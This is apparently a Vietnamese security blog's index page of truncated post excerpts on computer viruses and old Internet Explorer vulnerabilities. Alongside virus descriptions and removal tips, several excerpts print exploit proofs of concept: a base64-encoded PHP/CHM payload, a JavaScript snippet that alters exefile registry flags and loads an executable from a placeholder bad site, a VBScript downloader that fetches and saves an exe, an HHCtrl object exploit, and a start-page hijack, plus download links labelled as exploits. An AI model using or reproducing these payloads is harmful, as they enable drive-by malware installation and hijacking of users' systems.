Tên virus : SafeSys Loại : autorun, lây file Mức độ : nguy hiểm Khuyến cáo : khi sử dụng máy ảo để chạy thử virus phải tắt hết những đường share với máy thật -> ko khéo máy thật dính thì lại càng nguy ! Thông tin thêm : virus có khả năng qua..
Read more1. Loại malware này khi nhiễm vào máy sẽ tạo key vào Registry ở hive HKLM. Mở rộng với 3 key [OptionalComponents]. Thừa hưởng tính năng SupperHidden của dòng họ [Autorun Virus]
Read moreBài của Dungcoi * Tên malware: SecretC * Thuộc họ: Secret * Loại: Worm * Xuất xứ : Việt Nam * Kích thước: 112kb (Đã pack), 250kb (Chưa pack) * Mức độ phá hoại: Ko rõ Nguy cơ: Bị KeyLog, mất các thông tin quan trọng như mật khẩu… Do có tính năng tự down..
Read moreBài của DungCoi Nguyên tắc khi phân tích virus : 1. Không tìm cách xóa virus trong hệ thống. Có thể bạn ngạc nhiên về điều này, nhưng thực ra, cái chúng ta muốn thực hiện đó là dừng hoàn toàn virus làm việc, còn việc lưu trữ chúng hoàn toàn là không cần thiết…
Read moreTrước tiên ta cần 1 file ảnh và 1 file rar đặt trong thư mục Test nằm ở ổ C…. Vào Start, chọn Run điền cmd vào hộp thoại và ấn Enter. Cửa sổ Command Prompt sẽ được hiện ra. Bạn gõ vào đó câu lệnh CD để đưa con trỏ về thư mục gốc…
Read moreHãng bảo mật Kaspersky cuối tuần qua đã phải lên tiếng kêu gọi sự giúp đỡ của cộng đồng để bẻ khóa cơ chế mã hóa 1024-bit RSA được tin tặc ứng dụng trong phiên bản mới Trojan Gpcode. Một khi con Trojan này đột nhập thành công vào PC nó sẽ ngay lập tức..
Read moreThe following proof of concept was provided by “[email protected]” <[email protected]>: <? function malware() { header(“Content-type: text/html”); header(“Content-Disposition: attachment”); echo base64_decode( ‘PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW’. ‘Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N’. ‘Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm’. ‘1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp’. ‘dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm’. ‘UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu’. ‘Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn’. ‘BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7’. ‘DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG’. ‘UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj’. ‘cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF’. ‘0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy’. ‘aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT’. ‘0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc’. ‘bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX’. ‘QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN’. ‘CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA’. ‘0KPC9TQ1JJUFQ+DQogDQoNCg==’.”);} { malware(); } PHP ?>
Read moreExploit: http://rapidshare.com/files/124044383/_malware_Microsoft_Internet_Explorer_Self_Executing_HTML_File_Vulnerability.rar
Read moreThe following proof of concept has been supplied: <span datasrc=”#oExec” datafld=”exploit” dataformatas=”html”></span> <xml id=”oExec”> <security> <exploit> <![CDATA[ <object id=”oFile” data=”badnews.php”></object> ]]> </exploit> </security> </xml>
Read moreVulnerable: Microsoft Internet Explorer 6.0 SP1 – Microsoft Internet Explorer 6.0 Credit: “[email protected]” <[email protected]> disclosed this weakness. Several proof-of-concept examples have been presented: “Matthew Murphy” <[email protected]> proposed: <html><head> <script language=”JavaScript” defer> function throw_onload() { actx.RegWrite(“HKCR\\exefile\\EditFlags”, 0x38070000, “REG_BINARY”); window.close(); } var actx = new ActiveXObject(“WScript.Shell”); actx.RegWrite(“HKCR\\exefile\\EditFlags”, 256, “REG_BINARY”); document.writeln(“<IFRAME SRC=\”http://www.somebadsite.com/file.exe\” ONLOAD=\”throw_onload()\” />”); window.setTimeout(“throw_onload()”, 5000); //..
Read moreExploit: http://rapidshare.com/files/124034189/_malware_Microsoft_Internet_Explorer_Valid_File_Drag_and_Drop_Embedded_Code_Vulnerability.rar
Read moreCác bạn có thói quen diệt virus, spyware, malware bằng các trình quét tự động nhưng để tiết kiệm thời gian và tăng khả năng hiểu biết về chúng, mình bày các bạn diệt bằng tay 1. bạn vào Start -> run gõ: notepad chép đọan này vào cd\ taskkill /f /im svohost.exe del /f..
Read moreThấy USB của mình không thấy chữ Open nữa mà thay = chữ “´ò¿ª(&O)” vậy là dính virus Virus Bloodhound.W32.EP rồi đó Đích nhiễm: 1. Thư mục C:\Program Files\Common Files và các thư mục con System\ và Microsoft Shared\. Virus tạo ra các tập tin là: tbouhmb.exe, vrrrysp.exe, mwhegbu.exe … 2. Registry: Virus xâm nhập..
Read more<script language=”VBScript”> on error resume next dl = “link.exe” Set df = document.createElement(“object”) df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″ str=”Microsoft.XMLHTTP” Set x = df.CreateObject(str,””) a1=”Ado” a2=”db.” a3=”Str” a4=”eam” str1=a1&a2&a3&a4 str5=str1 set S = df.createobject(str5,””) S.type = 1 str6=”GET” x.Open str6, dl, False x.Send fname1=”bl4ck.com” set F = df.createobject(“Scripting.FileSystemObject”,””) set tmp = F.GetSpecialFolder(2) ‘ Get tmp folder fname1= F.BuildPath(tmp,fname1)..
Read more– Microsoft Internet Explorer 6.0 – Microsoft Windows XP Pro SP2 – Microsoft Windows XP Home SP2 Tạo trang web nội dung bất kỳ (ví dụ hack.htm ) có đính kèm đoạn mã sau đây : <OBJECT id=”localpage” type=”application/x-oleobject” classid=”clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11″ height=7% style=”position:absolute;top:140;left:72;z-index:100;” codebase=”hhctrl.ocx#Version=5,2,3790,1194″ width=”7%”> <PARAM name=”Command” value=”Related Topics, MENU”> <PARAM name=”Button” value=”Text:Just a button”> <PARAM..
Read moreVí dụ vào 1 page với tên miền mở rộng là html, hay htm, php, asp…. thật nguy hiểm nếu không có antivirus hay sài trình duyệt update full Ví dụ đơn giản : <APPLET ID=”Shl” CLASSID=”CLSID:F935DC26-1CF0-11D0-ADB9-00C04FD58A0B”> </APPLET> <script> Shl.RegWrite (“HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page”, “http://secure-lab.net”); </script> nếu ActiveX đó thực thi path chứa file exe khi..
Read more
Leave a Reply